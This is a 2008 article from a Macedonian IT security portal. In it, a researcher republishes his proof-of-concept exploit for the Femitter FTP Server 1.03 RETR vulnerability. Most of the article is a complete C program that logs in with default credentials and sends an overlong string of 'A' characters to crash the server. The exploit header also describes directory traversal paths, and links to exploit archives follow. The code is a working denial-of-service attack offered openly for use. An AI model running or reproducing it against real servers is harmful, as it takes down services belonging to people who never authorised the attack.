IT.com.mk - Македонски ИТ портал - Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC

Компјутерска сигурност

Интернет, Дизајн и анимација, Сигурност, Мрежи, Оперативни системи

RSS Канал
Е-пошта
Биографија

Ѓоко Крстиќ

Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC

Автор: Ѓоко Крстиќ
Објавено на: 02.10.2008
Acritum Femitter HTTP/FTP Server (http://acritum.com/fem/index.htm) е ранлив на DoS напад со кој се оневозможува пристап до серверот односно доаѓа до "падање" на серверот со успешна експлоатација. Ја најдов слабоста одамна и експлоитот е веќе јавно достапен но еве зошто да го нема и тука. :) Да не должам многу, се работи за ранлива команда RETR која служи за испраќање на податоци од страна на серверот. Доколку испратиме премногу аргументи на командата доаѓа до DoS напад. Исто така зборуваме за повеќе слабости кај овој софтвер како корупција на меморија, Directory Traversal и сл. Следува доказ на концептот: -----------------------------------------C код----------------------------------------- /0-----------------------------------------------------------------------------------0\ 0 0 \| \| \| Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC \| \| \| \| Summary: Femitter Server is an easy-to use HTTP and FTP server application \| \| for Windows which allows you to use your own computer for sharing gigabytes \| \| of files with your friends and colleagues. \| \| \| \| Desc: Femitter HTTP/FTP 1.03 suffers from a denial of service vulnerability \| \| and memory corruption that causes the application to crash. When we send to \| \| the RETR command an argument like AAAA:AAAA or an overly long string of As \| \| (1024), the server crashes instantly. Also, when typing into browser: \| \| ftp://127.0.0.1/\.. we traverse to the install folder of the program(CWD), \| \| and when browsing to ftp://127.0.0.1/\..\/\..\ we get access violation at \| \| address 004A218A in module "fem.exe". Write of address 00000000. \| \| \| \| Producst web page: http://acritum.com/fem/index.htm \| \| \| \| Tested on Microsoft Windows XP SP2 (English) \| \| \| \| Vulnerability discovered by Gjoko 'LiquidWorm' Krstic \| \| \| \| liquidworm [t00t] gmail.com \| \| \| \| http://www.zeroscience.org/ \| \| \| \| 17.09.2008 \| \| \| 0 0 \0-----------------------------------------------------------------------------------0/ #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <netdb.h> #define MANA "\x52\x45\x54\x52\x20\x41\x41\x41\x41\x3A\x41\x41\x41\x41\xD\xA" void header(void); int main (int argc, char argv[]) { int sckt = 0, sfd = 0; char user[] = "USER admin\r\n"; char pass[] = "PASS nimda\r\n"; unsigned char payload[]= "\x52\x45\x54\x52\x20\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\xD\xA"; header(); if(argc != 3) { printf("\nUsage: %s [ip] [port]\n\n", argv[0]); return (EXIT_SUCCESS); } struct sockaddr_in dos_ftp; sfd = socket(AF_INET, SOCK_STREAM, 0); if(sfd < 0) { perror("Socket"); printf("Error creating socket...\n"); return(1); } printf("\n\n[+] Socket created!\n"); sleep (1); memset(&dos_ftp, 0x0, sizeof(dos_ftp)); dos_ftp.sin_family = AF_INET; dos_ftp.sin_addr.s_addr = inet_addr(argv[1]); dos_ftp.sin_port = htons(atoi(argv[2])); sckt = connect(sfd, (struct sockaddr ) &dos_ftp, sizeof(dos_ftp)); if(sckt < 0) { perror("Connect"); printf("Error connecting...\n"); return(1); } printf("[+] Connection established!\n"); sleep (1); write(sfd, user, strlen(user)); // username printf("[+] Sending CMD: %s\n", user); sleep (2); write(sfd, pass, strlen(pass)); // password printf("[+] Sending CMD: %s\n", pass); sleep (2); printf("[+] Sending malicious buffer to %s on port %s ...\n", argv[1], argv[2]); sleep(2); send(sfd, payload, sizeof(payload), 0); // send(sfd, MANA, sizeof(MANA),0); printf("[+] Malicious buffer succesfully sent...\n"); sleep (1); printf("[+] Femitter FTP Server v1.03 on %s has crashed!\n\n", argv[1]); close (sfd); return(0); } void header() { printf("\n********************************************************************\n\n"); printf("\tFemitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC\n"); printf("\t\t\tby LiquidWorm \n\n"); printf("*******************************************************************\n\n"); } -----------------------------------------C код-----------------------------------------* Експлоатација на Femitter FTP Server Референти: - http://www.milw0rm.com/exploits/6481 - http://www.securityfocus.com/bid/31226 - http://www.securitylab.ru/poc/extra/359669.php - http://www.sebug.net/exploit/4658/ - http://www.packetstormsecurity.org/filedesc/fermitter-dos.txt.html - http://www.emagined.com/security_exploits_article.php?target=6481.html - http://forum.blackhack.ru/showthread.php?t=2650 - http://www.astalavista.com/index.php?section=exploits&cmd=details&id=6583 - http://securityreason.com/exploitalert/4715 - http://www.zeroscience.org/codes/femitter-dos.c Клучни зборови: Femitter FTP Server DoS Експлоит Exploit PoC RETR Слабост Directory Traversal

Сподели:

Последни написи на Ѓоко

Измами со кредитни картички
објавено на 07.06.2009 во Сигурност

Verizon - Сигурносен извештај за 2009
објавено на 16.04.2009 во Сигурност

SEAT
објавено на 15.03.2009 во Сигурност

w3af - Конструкција за Напад и Ревизија на Веб Апликации
објавено на 03.03.2009 во Сигурност

Secunia - Сигурносен извештај за 2008 година
објавено на 27.02.2009 во Сигурност

ENIAC

ENIAC е првиот електронски компјутер, објавен во 1946, кој тежел 30 тони, имал над 17.000 цевки и бил долг 25 метри. Денешниот десктоп компјутер во просек може да сними милион пати повеќе информации отколку ENIAC и истото да го направи 50.000 пати побрзо.

Тркалезна маса за активно граѓанско учество
Во рамките на Проектот за децентрализиран...
07.07.2009

WebFest: Најдобри регионални проекти
WebFest е првиот регионален фестивал кој има �...
15.09.2009

biZbuZZ 2009
Од 28-30 Октомври, 2009 во хотелот "Видиковац" в...
28.10.2009